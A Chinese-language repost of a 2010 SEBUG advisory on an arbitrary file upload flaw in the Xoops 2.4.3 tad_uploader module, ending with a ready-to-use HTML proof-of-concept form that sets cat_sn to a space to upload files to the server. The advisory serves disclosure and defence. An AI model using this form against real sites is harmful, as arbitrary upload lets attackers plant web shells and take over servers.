注册
登陆
首页
关于
新闻
文档
论坛
下载
用户名
密码
记住我
还未注册?
本站新闻
通过email发送
Email 地址
*
标题
*
内容
*
注意:xoops tad_uploader模块上传漏洞 SSV ID:19742 SEBUG-Appdir:Xoops 发布时间:2010-06-05 影响版本: Xoops 2.4.3 漏洞描述: Xoops是非常流行的动态web内容管理系统,用面向对象的PHP编写。 xoops tad_uploader模块cat_sn参数为空格时可以任意上传文件至uploads/tad_uploader/目录。 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! <FORM action='http://URL/modules/tad_uploader/index.php' method='POST' enctype='multipart/form-data'> <p><b>從硬碟上傳檔案:</b><input type='file' name='cc_file[0]' size='20'></p> <p><b>直接從網路取得:</b><input type='text' name='cc_file_url' size='30'><br>( <b>檔案說明</b><br><textarea name='cf_desc[0]' cols=50 rows=3 style='width:100%'></textarea> <input type='hidden' name='cat_sn' value=' '> <input type='hidden' name='op' value='replace_data'> <input type='submit' value='送出'> </FORM> SEBUG安全建议: 厂商补丁: Xoops ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://xoops.sourceforge.net/ // sebug.net [2010-06-05] 更多... http://xoops.org.cn/modules/news/view.article.php/c1/1236